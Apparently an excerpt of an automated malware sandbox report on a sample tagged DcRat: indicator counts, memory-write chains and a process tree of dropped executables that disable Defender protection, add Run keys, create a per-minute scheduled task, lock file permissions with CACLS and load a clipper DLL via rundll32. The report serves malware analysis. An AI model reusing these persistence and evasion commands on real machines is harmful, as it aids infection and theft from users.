pid Process 2716 1fX89KT6.exe 2716 1fX89KT6.exe 4472 3qu90Pt.exe 4472 3qu90Pt.exe 3208 Process not Found 3208 Process not Found 3208 Process not Found 3208 Process not Found 3208 Process not Found 3208 Process not Found 3208 Process not Found 3208 Process not Found 3208 Process not Found 3208 Process not Found 3208 Process not Found 3208 Process not Found 3208 Process not Found 3208 Process not Found 3208 Process not Found 3208 Process not Found 3208 Process not Found 3208 Process not Found 3208 Process not Found 3208 Process not Found 3208 Process not Found 3208 Process not Found 3208 Process not Found 3208 Process not Found 3208 Process not Found 3208 Process not Found 3208 Process not Found 3208 Process not Found 3208 Process not Found 3208 Process not Found 3208 Process not Found 3208 Process not Found 3208 Process not Found 3208 Process not Found 3208 Process not Found 3208 Process not Found 3208 Process not Found 3208 Process not Found 3208 Process not Found 3208 Process not Found 3208 Process not Found 3208 Process not Found 3208 Process not Found 3208 Process not Found 3208 Process not Found 3208 Process not Found 3208 Process not Found 3208 Process not Found 3208 Process not Found 3208 Process not Found 3208 Process not Found 3208 Process not Found 3208 Process not Found 3208 Process not Found 3208 Process not Found 3208 Process not Found 3208 Process not Found 3208 Process not Found 3208 Process not Found 3208 Process not Found -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 3208 Process not Found -
Suspicious behavior: MapViewOfSection 2 IoCs
pid Process 4472 3qu90Pt.exe 5864 toolspub2.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 11 IoCs
pid Process 388 msedge.exe 388 msedge.exe 388 msedge.exe 388 msedge.exe 388 msedge.exe 388 msedge.exe 388 msedge.exe 388 msedge.exe 388 msedge.exe 388 msedge.exe 388 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2716 1fX89KT6.exe Token: SeShutdownPrivilege 3208 Process not Found Token: SeCreatePagefilePrivilege 3208 Process not Found Token: SeShutdownPrivilege 3208 Process not Found Token: SeCreatePagefilePrivilege 3208 Process not Found Token: SeShutdownPrivilege 3208 Process not Found Token: SeCreatePagefilePrivilege 3208 Process not Found Token: SeShutdownPrivilege 3208 Process not Found Token: SeCreatePagefilePrivilege 3208 Process not Found Token: SeShutdownPrivilege 3208 Process not Found Token: SeCreatePagefilePrivilege 3208 Process not Found Token: SeDebugPrivilege 4972 A5C5.exe Token: SeShutdownPrivilege 3208 Process not Found Token: SeCreatePagefilePrivilege 3208 Process not Found Token: SeShutdownPrivilege 3208 Process not Found Token: SeCreatePagefilePrivilege 3208 Process not Found Token: SeShutdownPrivilege 3208 Process not Found Token: SeCreatePagefilePrivilege 3208 Process not Found Token: SeShutdownPrivilege 3208 Process not Found Token: SeCreatePagefilePrivilege 3208 Process not Found Token: SeShutdownPrivilege 3208 Process not Found Token: SeCreatePagefilePrivilege 3208 Process not Found Token: SeShutdownPrivilege 3208 Process not Found Token: SeCreatePagefilePrivilege 3208 Process not Found Token: SeShutdownPrivilege 3208 Process not Found Token: SeCreatePagefilePrivilege 3208 Process not Found Token: SeShutdownPrivilege 3208 Process not Found Token: SeCreatePagefilePrivilege 3208 Process not Found Token: SeShutdownPrivilege 3208 Process not Found Token: SeCreatePagefilePrivilege 3208 Process not Found Token: SeShutdownPrivilege 3208 Process not Found Token: SeCreatePagefilePrivilege 3208 Process not Found Token: SeDebugPrivilege 1912 AAB9.exe Token: SeShutdownPrivilege 3208 Process not Found Token: SeCreatePagefilePrivilege 3208 Process not Found Token: SeShutdownPrivilege 3208 Process not Found Token: SeCreatePagefilePrivilege 3208 Process not Found Token: SeShutdownPrivilege 3208 Process not Found Token: SeCreatePagefilePrivilege 3208 Process not Found Token: SeShutdownPrivilege 3208 Process not Found Token: SeCreatePagefilePrivilege 3208 Process not Found Token: SeShutdownPrivilege 3208 Process not Found Token: SeCreatePagefilePrivilege 3208 Process not Found Token: SeShutdownPrivilege 3208 Process not Found Token: SeCreatePagefilePrivilege 3208 Process not Found Token: SeShutdownPrivilege 3208 Process not Found Token: SeCreatePagefilePrivilege 3208 Process not Found Token: SeShutdownPrivilege 3208 Process not Found Token: SeCreatePagefilePrivilege 3208 Process not Found Token: SeShutdownPrivilege 3208 Process not Found Token: SeCreatePagefilePrivilege 3208 Process not Found Token: SeShutdownPrivilege 3208 Process not Found Token: SeCreatePagefilePrivilege 3208 Process not Found Token: SeShutdownPrivilege 3208 Process not Found Token: SeCreatePagefilePrivilege 3208 Process not Found Token: SeShutdownPrivilege 3208 Process not Found Token: SeCreatePagefilePrivilege 3208 Process not Found Token: SeShutdownPrivilege 3208 Process not Found Token: SeCreatePagefilePrivilege 3208 Process not Found Token: SeShutdownPrivilege 3208 Process not Found Token: SeCreatePagefilePrivilege 3208 Process not Found Token: SeShutdownPrivilege 3208 Process not Found Token: SeCreatePagefilePrivilege 3208 Process not Found Token: SeShutdownPrivilege 3208 Process not Found -
Suspicious use of FindShellTrayWindow 25 IoCs
pid Process 388 msedge.exe 388 msedge.exe 388 msedge.exe 388 msedge.exe 388 msedge.exe 388 msedge.exe 388 msedge.exe 388 msedge.exe 388 msedge.exe 388 msedge.exe 388 msedge.exe 388 msedge.exe 388 msedge.exe 388 msedge.exe 388 msedge.exe 388 msedge.exe 388 msedge.exe 388 msedge.exe 388 msedge.exe 388 msedge.exe 388 msedge.exe 388 msedge.exe 388 msedge.exe 388 msedge.exe 388 msedge.exe -
Suspicious use of SendNotifyMessage 24 IoCs
pid Process 388 msedge.exe 388 msedge.exe 388 msedge.exe 388 msedge.exe 388 msedge.exe 388 msedge.exe 388 msedge.exe 388 msedge.exe 388 msedge.exe 388 msedge.exe 388 msedge.exe 388 msedge.exe 388 msedge.exe 388 msedge.exe 388 msedge.exe 388 msedge.exe 388 msedge.exe 388 msedge.exe 388 msedge.exe 388 msedge.exe 388 msedge.exe 388 msedge.exe 388 msedge.exe 388 msedge.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4368 wrote to memory of 4120 4368 file.exe 84 PID 4368 wrote to memory of 4120 4368 file.exe 84 PID 4368 wrote to memory of 4120 4368 file.exe 84 PID 4120 wrote to memory of 2196 4120 VH4vX77.exe 85 PID 4120 wrote to memory of 2196 4120 VH4vX77.exe 85 PID 4120 wrote to memory of 2196 4120 VH4vX77.exe 85 PID 2196 wrote to memory of 2744 2196 ro8sA21.exe 86 PID 2196 wrote to memory of 2744 2196 ro8sA21.exe 86 PID 2196 wrote to memory of 2744 2196 ro8sA21.exe 86 PID 2744 wrote to memory of 3408 2744 DO2BB55.exe 87 PID 2744 wrote to memory of 3408 2744 DO2BB55.exe 87 PID 2744 wrote to memory of 3408 2744 DO2BB55.exe 87 PID 3408 wrote to memory of 2716 3408 TK1xO34.exe 88 PID 3408 wrote to memory of 2716 3408 TK1xO34.exe 88 PID 3408 wrote to memory of 2716 3408 TK1xO34.exe 88 PID 3408 wrote to memory of 3304 3408 TK1xO34.exe 93 PID 3408 wrote to memory of 3304 3408 TK1xO34.exe 93 PID 3408 wrote to memory of 3304 3408 TK1xO34.exe 93 PID 2744 wrote to memory of 4472 2744 DO2BB55.exe 94 PID 2744 wrote to memory of 4472 2744 DO2BB55.exe 94 PID 2744 wrote to memory of 4472 2744 DO2BB55.exe 94 PID 2196 wrote to memory of 5036 2196 ro8sA21.exe 95 PID 2196 wrote to memory of 5036 2196 ro8sA21.exe 95 PID 2196 wrote to memory of 5036 2196 ro8sA21.exe 95 PID 3208 wrote to memory of 1916 3208 Process not Found 100 PID 3208 wrote to memory of 1916 3208 Process not Found 100 PID 3208 wrote to memory of 1916 3208 Process not Found 100 PID 1916 wrote to memory of 4124 1916 9F58.exe 101 PID 1916 wrote to memory of 4124 1916 9F58.exe 101 PID 1916 wrote to memory of 4124 1916 9F58.exe 101 PID 3208 wrote to memory of 1664 3208 Process not Found 102 PID 3208 wrote to memory of 1664 3208 Process not Found 102 PID 3208 wrote to memory of 1664 3208 Process not Found 102 PID 3208 wrote to memory of 1088 3208 Process not Found 103 PID 3208 wrote to memory of 1088 3208 Process not Found 103 PID 4124 wrote to memory of 3904 4124 AH0ga1vM.exe 104 PID 4124 wrote to memory of 3904 4124 AH0ga1vM.exe 104 PID 4124 wrote to memory of 3904 4124 AH0ga1vM.exe 104 PID 3904 wrote to memory of 632 3904 qS9tw1uX.exe 106 PID 3904 wrote to memory of 632 3904 qS9tw1uX.exe 106 PID 3904 wrote to memory of 632 3904 qS9tw1uX.exe 106 PID 3208 wrote to memory of 3696 3208 Process not Found 107 PID 3208 wrote to memory of 3696 3208 Process not Found 107 PID 3208 wrote to memory of 3696 3208 Process not Found 107 PID 3208 wrote to memory of 4972 3208 Process not Found 108 PID 3208 wrote to memory of 4972 3208 Process not Found 108 PID 3208 wrote to memory of 4972 3208 Process not Found 108 PID 632 wrote to memory of 4800 632 sC2xv8pP.exe 109 PID 632 wrote to memory of 4800 632 sC2xv8pP.exe 109 PID 632 wrote to memory of 4800 632 sC2xv8pP.exe 109 PID 4800 wrote to memory of 2992 4800 hd8Im5XM.exe 110 PID 4800 wrote to memory of 2992 4800 hd8Im5XM.exe 110 PID 4800 wrote to memory of 2992 4800 hd8Im5XM.exe 110 PID 3208 wrote to memory of 2596 3208 Process not Found 111 PID 3208 wrote to memory of 2596 3208 Process not Found 111 PID 3208 wrote to memory of 2596 3208 Process not Found 111 PID 1088 wrote to memory of 388 1088 cmd.exe 112 PID 1088 wrote to memory of 388 1088 cmd.exe 112 PID 3208 wrote to memory of 2148 3208 Process not Found 114 PID 3208 wrote to memory of 2148 3208 Process not Found 114 PID 3208 wrote to memory of 2148 3208 Process not Found 114 PID 4800 wrote to memory of 3040 4800 hd8Im5XM.exe 115 PID 4800 wrote to memory of 3040 4800 hd8Im5XM.exe 115 PID 4800 wrote to memory of 3040 4800 hd8Im5XM.exe 115 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- DcRat
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:4368 -
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\VH4vX77.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\VH4vX77.exe2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:4120 -
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\ro8sA21.exeC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\ro8sA21.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:2196 -
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\DO2BB55.exeC:\Users\Admin\AppData\Local\Temp\IXP002.TMP\DO2BB55.exe4⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:2744 -
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\TK1xO34.exeC:\Users\Admin\AppData\Local\Temp\IXP003.TMP\TK1xO34.exe5⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:3408 -
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1fX89KT6.exeC:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1fX89KT6.exe6⤵
- Modifies Windows Defender Real-time Protection settings
- Executes dropped EXE
- Windows security modification
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2716
-
-
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2Pm6119.exeC:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2Pm6119.exe6⤵
- Executes dropped EXE
PID:3304
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3qu90Pt.exeC:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3qu90Pt.exe5⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:4472
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\4HS096BX.exeC:\Users\Admin\AppData\Local\Temp\IXP002.TMP\4HS096BX.exe4⤵
- Executes dropped EXE
PID:5036
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\9F58.exeC:\Users\Admin\AppData\Local\Temp\9F58.exe1⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:1916 -
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\AH0ga1vM.exeC:\Users\Admin\AppData\Local\Temp\IXP003.TMP\AH0ga1vM.exe2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:4124 -
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\qS9tw1uX.exeC:\Users\Admin\AppData\Local\Temp\IXP004.TMP\qS9tw1uX.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:3904 -
C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\sC2xv8pP.exeC:\Users\Admin\AppData\Local\Temp\IXP005.TMP\sC2xv8pP.exe4⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:632 -
C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\hd8Im5XM.exeC:\Users\Admin\AppData\Local\Temp\IXP006.TMP\hd8Im5XM.exe5⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:4800 -
C:\Users\Admin\AppData\Local\Temp\IXP007.TMP\1AP90VT0.exeC:\Users\Admin\AppData\Local\Temp\IXP007.TMP\1AP90VT0.exe6⤵
- Executes dropped EXE
PID:2992
-
-
C:\Users\Admin\AppData\Local\Temp\IXP007.TMP\2ki127Ll.exeC:\Users\Admin\AppData\Local\Temp\IXP007.TMP\2ki127Ll.exe6⤵
- Executes dropped EXE
PID:3040
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\A0FF.exeC:\Users\Admin\AppData\Local\Temp\A0FF.exe1⤵
- Executes dropped EXE
PID:1664
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\A238.bat" "1⤵
- Suspicious use of WriteProcessMemory
PID:1088 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/login2⤵
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:388 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff9d71946f8,0x7ff9d7194708,0x7ff9d71947183⤵PID:4616
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2216,4443918831769379397,1664629824114671608,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2228 /prefetch:23⤵PID:2220
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2216,4443918831769379397,1664629824114671608,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2288 /prefetch:33⤵PID:2328
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2216,4443918831769379397,1664629824114671608,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2520 /prefetch:83⤵PID:2960
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2216,4443918831769379397,1664629824114671608,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3364 /prefetch:13⤵PID:3236
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2216,4443918831769379397,1664629824114671608,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3376 /prefetch:13⤵PID:1692
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2216,4443918831769379397,1664629824114671608,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3972 /prefetch:13⤵PID:1420
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2216,4443918831769379397,1664629824114671608,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5108 /prefetch:13⤵PID:5412
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2216,4443918831769379397,1664629824114671608,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5392 /prefetch:13⤵PID:5544
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2216,4443918831769379397,1664629824114671608,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6044 /prefetch:13⤵PID:5688
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2216,4443918831769379397,1664629824114671608,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6028 /prefetch:13⤵PID:5676
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2216,4443918831769379397,1664629824114671608,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4020 /prefetch:13⤵PID:4552
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2216,4443918831769379397,1664629824114671608,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5324 /prefetch:13⤵PID:1668
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2216,4443918831769379397,1664629824114671608,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6276 /prefetch:13⤵PID:5976
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2216,4443918831769379397,1664629824114671608,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6240 /prefetch:13⤵PID:3684
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/2⤵PID:5096
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9d71946f8,0x7ff9d7194708,0x7ff9d71947183⤵PID:2976
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1448,8078885434444204845,17138545947143437028,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2092 /prefetch:23⤵PID:2956
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1448,8078885434444204845,17138545947143437028,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2144 /prefetch:33⤵PID:4156
-
-
-
C:\Users\Admin\AppData\Local\Temp\A46C.exeC:\Users\Admin\AppData\Local\Temp\A46C.exe1⤵
- Executes dropped EXE
PID:3696
-
C:\Users\Admin\AppData\Local\Temp\A5C5.exeC:\Users\Admin\AppData\Local\Temp\A5C5.exe1⤵
- Modifies Windows Defender Real-time Protection settings
- Executes dropped EXE
- Windows security modification
- Suspicious use of AdjustPrivilegeToken
PID:4972
-
C:\Users\Admin\AppData\Local\Temp\A6FE.exeC:\Users\Admin\AppData\Local\Temp\A6FE.exe1⤵
- Checks computer location settings
- Executes dropped EXE
PID:2596 -
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe"C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
PID:4004 -
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe" /F3⤵
- DcRat
- Creates scheduled task(s)
PID:3512
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "explothe.exe" /P "Admin:N"&&CACLS "explothe.exe" /P "Admin:R" /E&&echo Y|CACLS "..\fefffe8cea" /P "Admin:N"&&CACLS "..\fefffe8cea" /P "Admin:R" /E&&Exit3⤵PID:3504
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"4⤵PID:4372
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "explothe.exe" /P "Admin:N"4⤵PID:5204
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "explothe.exe" /P "Admin:R" /E4⤵PID:5792
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"4⤵PID:5852
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "..\fefffe8cea" /P "Admin:N"4⤵PID:5868
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "..\fefffe8cea" /P "Admin:R" /E4⤵PID:6128
-
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main3⤵PID:4144
-
-
-
C:\Users\Admin\AppData\Local\Temp\A98F.exeC:\Users\Admin\AppData\Local\Temp\A98F.exe1⤵
- Executes dropped EXE
PID:2148 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=A98F.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.02⤵PID:5232
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9d71946f8,0x7ff9d7194708,0x7ff9d71947183⤵PID:5256
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=A98F.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.02⤵PID:5392
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9d71946f8,0x7ff9d7194708,0x7ff9d71947183⤵PID:5448
-
-
-
C:\Users\Admin\AppData\Local\Temp\AAB9.exeC:\Users\Admin\AppData\Local\Temp\AAB9.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1912
-
C:\Users\Admin\AppData\Local\Temp\AEB2.exeC:\Users\Admin\AppData\Local\Temp\AEB2.exe1⤵
- Executes dropped EXE
PID:4704
-
C:\Users\Admin\AppData\Local\Temp\B952.exeC:\Users\Admin\AppData\Local\Temp\B952.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4472 -
